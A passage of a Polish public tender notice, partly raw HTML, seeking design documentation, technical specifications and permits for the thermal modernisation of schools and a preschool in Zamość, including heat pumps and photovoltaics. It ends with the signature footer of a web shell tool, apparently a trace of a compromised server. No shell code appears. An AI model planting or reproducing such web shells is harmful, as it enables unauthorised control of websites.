Opracowanie wielobranżowych projektów budowlano-wykonawczych docieplenia obiektów, projektów modernizacji instalacji centralnego ogrzewania (jeśli są wymagane) z zaprojektowaniem źródła ciepła z wykorzystaniem energii z wody gruntowej poprzez odwierty, projekt instalacji fotowoltaicznej, w przypadku konieczności opracowanie raportu oddziaływania na środowisko, uzyskanie decyzji środowiskowej, uzyskanie pozwolenia na budowę składających się 
w szczególności z: 

a)	planów, rysunków, szkiców oraz innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót podstawowych oraz ich uwarunkowań i dokładnej lokalizacji ich wykonania wraz z usunięciem kolizji 
z istniejącym uzbrojeniem, drzewostanem itp. - tzn. gotowe do złożenia w celu uzyskania pozwolenia na budowę wielobranżowe projekty budowlane wraz z uzgodnieniami i opiniami, zawierające informacje dotyczące bezpieczeństwa i ochrony zdrowia, sporządzone zgodnie z ustawą z dnia 
7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm), Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2012r. poz.462) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. 2013 r. poz. 1129) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego; 

b)	przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót, łącznie z robotami nie przewidzianymi w projekcie, ale koniecznymi do wykonania z punktu widzenia sztuki budowlanej w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych;

c)	opracowanie dokumentacji geologicznej z terenu, gdzie będą zaprojektowane odwierty dla potrzeb pomp ciepła;

d)	uzgodnień i opinii, jeżeli będą one wymagane odrębnymi przepisami;

e)	specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowanie zawierające zbiór wymagań, które są niezbędne do określenia standardu i jakości wykonania robot, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót) sporządzonej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013. poz. 1129);

f)	opracowana dokumentacja winna spełniać wymogi do aplikowania o dofinansowanie z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014-2020 Oś Priorytetowa 4 - Energia przyjazna środowisku.

3.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy oddzielnie dla każdego z obiektów oświatowych wchodzących w zakres danego Zadania.
4.	Szczegółowy opis wykonania przedmiotu zamówienia oraz zakres prac zawarty jest w umowach stanowiących integralną część tych umów, będących załącznikiem nr 8b do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Okres gwarancji i rękojmi za wady fizyczne i prawne - 3</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych:
a)Zespół Szkół Nr 4 w Zamościu, b)III Liceum Ogólnokształcące im. C.K. Norwida w Zamościu , c)Zespół Szkół Ponadgimnazjalnych Nr 3 im  AK w Zamościu , d)Szkoła Podstawowa Nr 2 i Gimnazjum Nr 2 w Zamościu , e)Przedszkole Miejskie Nr 10 w Zamościu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 3 - Opracowanie dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych, kosztorysu inwestorskiego na termomodernizację następujących obiektów oświatowych:
a)	Zespół Szkół Nr 4 w Zamościu ul. Hetmana Jana Zamoyskiego,
b)	III Liceum Ogólnokształcące im. C.K. Norwida w Zamościu ul. Kilińskiego 15, 
c)	Zespół Szkół Ponadgimnazjalnych Nr 3 im  AK w Zamościu ul. Zamoyskiego 62
d)	Szkoła Podstawowa Nr 2 i Gimnazjum Nr 2 w Zamościu ul. Lwowska 15,
e)	 Przedszkole Miejskie Nr 10 w Zamościu ul. Lwowska 17. 

1. Dokumentację projektową należy opracować w oparciu o zakres prac wynikających z audytów energetycznych (zgodnie z wymogami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane), będących załącznikami nr 11 do SIWZ.

2.	Zakres szczegółowy zamówienia: 
Opracowanie wielobranżowych projektów budowlano-wykonawczych docieplenia obiektów, projektów modernizacji instalacji centralnego ogrzewania (jeśli są wymagane) z zaprojektowaniem źródła ciepła z wykorzystaniem energii z wody gruntowej poprzez odwierty, projekt instalacji fotowoltaicznej, w przypadku konieczności opracowanie raportu oddziaływania na środowisko, uzyskanie decyzji środowiskowej, uzyskanie pozwolenia na budowę składających się 
w szczególności z: 

a)	planów, rysunków, szkiców oraz innych dokumentów umożliwiających jednoznaczne określenie rodzaju i zakresu robót podstawowych oraz ich uwarunkowań i dokładnej lokalizacji ich wykonania wraz z usunięciem kolizji 
z istniejącym uzbrojeniem, drzewostanem itp. - tzn. gotowe do złożenia w celu uzyskania pozwolenia na budowę wielobranżowe projekty budowlane wraz z uzgodnieniami i opiniami, zawierające informacje dotyczące bezpieczeństwa i ochrony zdrowia, sporządzonej zgodnie z ustawą z dnia 
7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013r. poz. 1409 z późn. zm), Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz.U. 2012r. poz.462) oraz zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. (Dz. U. 2013 r. poz. 1129) w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego; 

b)	przedmiaru robót, przez który należy rozumieć opracowanie zawierające zestawienie przewidywanych do wykonania robót, łącznie z robotami nie przewidzianymi w projekcie, ale koniecznymi do wykonania z punktu widzenia sztuki budowlanej w kolejności technologicznej ich wykonania wraz z ich szczegółowym opisem, miejscem wykonania lub wskazaniem podstaw ustalających szczegółowy opis, z wyliczeniem i zestawieniem ilości jednostek miar robót podstawowych oraz wskazaniem podstaw do ustalania cen jednostkowych robót lub jednostkowych nakładów rzeczowych;

c)	opracowanie dokumentacji geologicznej z terenu,gdzie będą zaprojektowane odwierty dla potrzeb pomp ciepła;

d)	uzgodnień i opinii, jeżeli będą one wymagane odrębnymi przepisami;

e)	specyfikacji technicznej wykonania i odbioru robót budowlanych (opracowanie zawierające zbiór wymagań, które są niezbędne do określenia standardu i jakości wykonania robot, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót) sporządzonej zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznej wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz.U. 2013. poz. 1129);

f)	opracowana dokumentacja winna spełniać wymogi do aplikowania 
o dofinansowanie z Regionalnego Programu Operacyjnego Województwa Lubelskiego na lata 2014-2020 Oś Priorytetowa 4 - Energia przyjazna środowisku.

3.	Wykonawca zobowiązuje się do wykonania przedmiotu umowy oddzielnie dla każdego z obiektów oświatowych wchodzących w zakres danego Zadania.
4.	Szczegółowy opis wykonania przedmiotu zamówienia oraz zakres prac zawarty jest w umowach stanowiących integralną część tych umów, będących załącznikiem nr 8c do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.07.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 97</li>
<li>2. Okres gwarancji i rękojmi za wady fizyczne i prawne - 3</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com